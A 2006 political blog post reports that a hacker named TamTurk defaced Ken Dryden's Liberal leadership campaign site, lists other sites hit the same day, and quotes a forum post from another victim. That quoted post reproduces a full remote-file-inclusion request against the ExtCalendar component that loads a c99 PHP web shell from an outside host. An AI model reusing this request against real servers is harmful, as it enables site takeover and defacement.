www.SteveJanke.com
Angry in the Great White North
Taking sloppy liberal thinking and tearing it a new one -- but always with a touch of class.


3422_Online_Banner_final.gif

The Liberal Party Choice: Two outsiders -- the one with ideas the one without :: Home Page :: Re-evaluating Marsha Akman

September 26, 2006

Ken Dryden's website hacked

0) { $pdfname=198353; } else { $pdfname="tbd"; } ?> View a printer-friendly PDF version of this article Posted by Steve Janke of the Blogging Tories at 09:48 PM
Related articles: Technorati Cosmos :: Canadian Blog Exchange
delicious.gif del.icio.us: Bookmark this!

"; echo "Technorati tags: "; $pos = strpos($keywords,"||"); if ($pos === false) { $tagkeywords=$keywords; } else { $tagkeywords=substr($keywords,0,$pos); } $pos = strpos($tagkeywords,"^^"); if ($pos === false) { $tagkeywords=$tagkeywords; } else { $tagkeywords=substr($tagkeywords,0,$pos); } $keyword_array=explode(",",$tagkeywords); $i=0; while($keyword_array[$i]) {$keyword=$keyword_array[$i]; $key_fixed=str_replace(" ","+",$keyword); $key_fixed=str_replace("'","%27",$key_fixed); $key_fixed=trim($key_fixed); $keyword=trim($keyword); if($i>0) echo ", ";?>"; } ?>

Ken Dryden's website is down for the count. Still offline at the time of writing, it was felled by a hacker named TamTurk. But before the conspiracy theories start flying, TamTurk does not work for any other Liberal leadership campaign. Ken Dryden was just unlucky.

It's been a tough day for the administrators of Ken Dryden's website:

An Internet hacker took over leadership hopeful Ken Dryden's website Tuesday.

The erstwhile hockey great's smiling visage and campaign pitch disappeared, replaced by a triumphal message: "Hacked by TamTurk. We are Turk."

That was followed by gibberish.

Lise Jolicoeur, spokeswoman for Dryden's campaign, said the hacker took over the site during the wee hours of the morning Tuesday.

Jolicoeur said no one has any idea who TamTurk is, but she's inclined to think it's just a prank - not deliberate sabotage by a rival leadership campaign.

That no one knows is strange, because TamTurk has been a busy boy.

First, check out what Ken Dryden's website looked like after the attack, but before it was taken down.

The text in the picture is some sort of Turkish proverb or saying about a "genuine push" and "helping", but I'm having trouble translating a couple of words.

The rest of the text are either TamTurk's signatures or words that mean something to the hacker community.

Why Dryden? Just dumb luck. Here is the list of attacks known to have been perpetrated by TamTurk today:

DIGITAL ATTACKS ARCHIVE

  • 09/26/2006: http://fuelspace.com
  • 09/26/2006: http://www.ottawachallenge.ca
  • 09/26/2006: http://www.kendryden.ca
  • 09/26/2006: http://www.lantmeeters.com
  • 09/26/2006: http://www.branchitude.com
  • 09/26/2006: http://www.kapelle-op-den-bos.net
  • 09/26/2006: http://www.drivesafe.com
  • 09/26/2006: http://spinetime16.com
  • 09/26/2006: http://cage8.com
  • 09/26/2006: http://michaelfordphotography.com
  • 09/26/2006: http://mebuildingdreams.com
  • 09/26/2006: http://gwac.ca
  • 09/26/2006: http://fairsolutions.com
  • 09/26/2006: http://hemantrao.com
  • 09/26/2006: http://rebecca.no
  • 09/26/2006: http://newcitycompound.com
  • 09/26/2006: http://beachviewretreat.com
  • 09/26/2006: http://byondbeads.com
  • 09/26/2006: http://bluebettausa.com
  • 09/26/2006: http://betterbettas.com

How was it done?

Hey guys, should this be a warning?? -->HacKeD By TamTurk<--

we got hacked twice last night. We are pretty sure the little fcuk's used extcalendar2 to get a Backdoor.PHP trojan onto the server. And we know what that means, yes,...everything is pretty fcuked. We fixed it but they left yet another little PHPshell (c99shell) hidden deep down,...and thew whole thing started again. Particularly emberassing for our clients as the site got defaced pretty badly with some Islam/Terror stuff,....

We went trough all the logs and actually found out that the stuff slept there for quite a while. Furthermore, we are pretty damn sure the files were placed trough:

.../components/com_extcalendar/admin_events.php

The whole command looked like this:
.../components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=htt p%3A%2F%2Fsvt.nukleon.us%2Ftools%2Fc99shell.txt%3F &act=ls&d=%2Fweb%2Fsites%2Fuser%2F12%2F&sort=0a"

Also, this php file did not have any defined( '_VALID_MOS' ) line...

We checked out other potential vulnerable scripts as the upload facilities of Docman and ZOOm,...but they are both upload facilities disbaled in the fron-end,..and the files seem secure,...

Any opinions:mad: :mad: :mad: :confused: :confused: :confused: ns

So this is not an attack by another leadership campaign, but an exploitation of PHP backdoors by a hacker who gets around.



Subscription:

If you liked this post, get free updates by email or RSS.



Trackbacks:

TrackBack URL for this entry: http://blog.mu.nu/cgi/trackback.cgi/187669


Comments:

Looks like Dryden's webteam wasn't staying up to date. He actually uses a Joomla CMS, instead of the Mambo referenced in your example.

This issue was first identified in April and discussed extensively in July along with resolutions. On top of that Joomla issued a Security Maintenance release on the 29th of August that addressed this vulnerability.

"Joomla! 1.0.11 [ Sunbow ] is now available as of Monday 28th August 2006 24:00 UTC for download here. and is being designated a critical security Release.

All existing Joomla! users must upgrade to this version, due to several High Level vulnerabilities that affect all previous versions of Joomla!"

Posted by: BBS at September 26, 2006 11:42 PM

I'm really beginning to hate joomla.

Posted by: the bear at September 27, 2006 07:48 AM

hate those hackers.

Posted by: real estate online at September 28, 2006 04:55 PM

how can we protect our web sites from hacking?

Posted by: wedding dresses at September 28, 2006 04:57 PM